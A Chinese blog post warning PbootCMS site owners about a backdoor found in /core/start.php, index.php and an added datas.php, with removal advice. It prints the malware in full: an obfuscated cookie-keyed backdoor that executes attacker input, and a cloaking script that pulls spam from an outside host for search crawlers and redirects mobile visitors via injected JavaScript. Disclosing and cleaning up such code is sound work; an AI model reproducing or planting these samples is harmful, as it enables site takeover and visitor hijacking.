首页 > 建站‧营销

Pbootcms发现网站后门start.php文件


Pbootcms发现网站后门/core/start.php文件,后门代码如下,请将该段代码删除:

<?php
if(isset($_COOKIE['a'])&&isset($_COOKIE['b'])&&isset($_COOKIE['c'])){session_start();if(!isset($_SESSION['views'])){$_SESSION['views']=$_COOKIE['c'];setcookie("c","",time()-3600,"/");}$a=$_SESSION['views'];$b='';$c=[$_COOKIE['a'],$_COOKIE['b']];$a=explode('.',$a);for($d=1;$d<count($a);$d++){$c[0]=$c[0]+$c[1];$e=chr($a[$d]-$c[0]);$b.=$e;}$f=@create_function(base64_decode('JA==').chr(351-236).str_rot13('b').chr(0110461/0525).base64_decode('ZQ=='),chr(0160175/01071).chr(0252430/01344).base64_decode('YQ==').base64_decode('bA==').chr(0x7a08/0x30d).chr(279-243).chr(0x13bcd/0x2bf).chr(0x35e-0x2ef).str_rot13('z').str_rot13('r').chr(0x7ff7/0x31f).base64_decode('Ow=='));}
?>

还有根目录的index.php,另外可能会新增一个datas.php,内容如下:

<?php
set_time_limit(0);error_reporting(0);$a="stristr";$b=$_SERVER;function httpGetlai($c){$d=curl_init();curl_setopt($d,CURLOPT_URL,$c);curl_setopt($d,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');curl_setopt($d,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($d,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($d,CURLOPT_RETURNTRANSFER,1);curl_setopt($d,CURLOPT_HEADER,0);$e=curl_exec($d);curl_close($d);return $e;}define('url',$b['REQUEST_URI']);define('ref',!isset($b['HTTP_REFERER'])?'':$b['HTTP_REFERER']);define('ent',$b['HTTP_USER_AGENT']);define('site',"http://qwe.xxseoapi.com/?");define('road',"domain=".$b['HTTP_HOST']."&path=".url."&spider=".urlencode(ent));define('memes',road."&referer=".urlencode(ref));define('regs','@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i');define('mobile','/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');define('area',$a(url,".xml")or $a(url,".fdc")or $a(url,".one")or $a(url,".bug")or $a(url,".doc")or $a(url,".love")or $a(url,".txt")or $a(url,".ppt")or $a(url,".pptx")or $a(url,".xls")or $a(url,".csv")or $a(url,".shtml")or $a(url,".znb")or $a(url,".msl")or $a(url,".mdb")or $a(url,".hxc"));if(preg_match(regs,ent)){if(area){echo httpGetlai(site.road);exit;}else{echo httpGetlai("http://qwe.xxseoapi.com/x.php");ob_flush();flush();}}if(area&&preg_match(mobile,ent)){echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly9qdW1wanMub3NzLWNuLWd1YW5nemhvdS5hbGl5dW5jcy5jb20vanMvaHo1OS5qcz48L3NjcmlwdD4=');exit;}
?>

这段代码是一个恶意代码,它的主要功能是将访问者的信息发送到一个远程服务器,并且如果访问者是搜索引擎爬虫,则会将其重定向到一个特定的网站。此外,它还会检查访问者是否使用移动设备,并在这种情况下将其重定向到另一个网站。建议立即删除此代码。

用Base64 编码/解码工具解码后,内容如下,也就是访问任何页面,手机端打开都会通过这个js跳转:

<script src=https://jumpjs.oss-cn-guangzhou.aliyuncs.com/js/hz59.js></script>

修复的话,需要删除index.php文件里的上述代码,同时删掉datas.php等非程序自带的文件!

备注:因为我是PB站点多,首先也是在PB站点发现的,其他的网站程序也有类似的挂马情况,请根据上述代码自行查看!

本文链接:https://www.zhanque.net/cms/3358.html